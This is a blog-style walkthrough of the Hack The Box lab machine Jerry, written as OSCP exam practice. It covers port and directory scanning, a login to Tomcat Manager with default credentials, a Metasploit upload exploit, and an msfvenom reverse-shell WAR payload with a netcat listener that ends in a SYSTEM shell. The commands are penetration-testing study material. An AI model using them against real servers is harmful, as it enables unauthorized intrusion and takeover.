Path to OSCP: Jerry
As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.
Next up is Jerry, starting off with the usual nmap scan (hope to do a deeper dive of nmap scanning shortly, I’m sure there are more efficient and faster nmap flags when it comes to OSCP/CTFs).
dr@nostromo:~$ sudo nmap -p- -A jerry.htb -oA nmap/jerry [sudo] password for dr: Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 15:22 BST Nmap scan report for jerry.htb (10.10.10.95) Host is up (0.038s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/7.0.88 |_http-server-header: Apache-Coyote/1.1 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%) OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 8080/tcp) HOP RTT ADDRESS 1 51.81 ms 10.10.14.1 2 51.95 ms jerry.htb (10.10.10.95) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 124.78 seconds
Just a single port open, TCP 8080 running Apache Tomcat.
I like to kick off some directory fuzzing whenever a web server is discovered. Again, something I need to look into for efficienies and how multiple tools work, but for now I instinctually kick off either ffuf or gobuster with a standard dictionary file while I perform further manual enumeration, as these scans can take quite a while to complete.
dr@nostromo:~$ gobuster dir -u http://jerry.htb:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://jerry.htb:8080 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/08/13 16:12:03 Starting gobuster in directory enumeration mode =============================================================== /docs (Status: 302) [Size: 0] [--> /docs/] /examples (Status: 302) [Size: 0] [--> /examples/] /manager (Status: 302) [Size: 0] [--> /manager/] /http%3A%2F%2Fwww (Status: 400) [Size: 0] /http%3A%2F%2Fyoutube (Status: 400) [Size: 0] /http%3A%2F%2Fblogs (Status: 400) [Size: 0] /http%3A%2F%2Fblog (Status: 400) [Size: 0] /**http%3A%2F%2Fwww (Status: 400) [Size: 0] /External%5CX-News (Status: 400) [Size: 0] /http%3A%2F%2Fcommunity (Status: 400) [Size: 0] /http%3A%2F%2Fradar (Status: 400) [Size: 0] /http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0] /http%3A%2F%2Fweblog (Status: 400) [Size: 0] /http%3A%2F%2Fswik (Status: 400) [Size: 0] Progress: 220558 / 220561 (100.00%) =============================================================== 2023/08/13 16:29:03 Finished ===============================================================
In this case, nothing discovered that couldn’t have been found from the frontpage itself (Tomcat Web Application Manager), but at least some peace of mind that there’s unlikely to be a simple CTF-style open directory for a foothold. Looking likely that this will involve a known vulnerability related to the Apache Tomcat/Coyote JSP version.
A search on searchsploit for Apache 7.0 reveals the below as most interesting:
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass
I initially attempted manual PUT requests with Burp Suite to trigger a POC, as detailed at Apache Tomcat RCE if readonly set to false (CVE-2017-12617) – Alphabot Security, but no success. I next try the available Python script from searchsploit, 42966.py, but this also fails, with the output “Not Vulnerable to CVE-2017-12617”.
dr@nostromo:~$ python 42966.py -u http://jerry.htb:8080 _______ ________ ___ ___ __ ______ __ ___ __ __ ______ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ [@intx0x80] Poc Filename Poc.jsp Not Vulnerable to CVE-2017-12617
After these failed attempts at CVE-2017-12617, it’s back to searchsploit, this time looking into Apache Manager, which throws up a few more leads:
Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit)
Application Upload sounds promising, “used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component”.
I load up the module in Metasploit and see that it requires authentication. This leads me to attempting a few Apache Tomcat default passwords, as found here: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
I get a hit from this list, and we’re into the Tomcat Web Application Manager:
More importantly, we have all the details we need to plug into the Metasploit module, including modifying the payload for Windows:
msf6 exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword s3cret no The password for the specified username HttpUsername tomcat no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.95 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager/ yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.3 yes The listen address (an interface may be specified) LPORT 7777 yes The listen port Exploit target: Id Name -- ---- 1 Windows Universal
We run the module, and immediately gain system access to retrieve both the user and root flags (“2 for the price of 1.txt”):
As with the previous box, this would be a waste of a Metasploit module in the actual OSCP exam, so let’s look at manual exploitation.
With access to the Manager, we can upload a malicious WAR file, and execute it in the browser to trigger a reverse shell to our system.
Using msfvenom we create the payload:
dr@nostromo:~$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=7777 -f war -o at.war Payload size: 13318 bytes Final size of war file: 13318 bytes Saved as: at.war
We then upload it under the Deploy section of the Apache Tomcat Manager, which results in the below:
We set up a netcat listener on the port we specified in msfvenom, and can trigger the payload by either clicking the /at link in the above Manager window or browsing directly to http://jerry.htb:8080/at/, resulting in a system shell:
dr@nostromo:~$ nc -lvnp 7777 listening on [any] 7777 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88>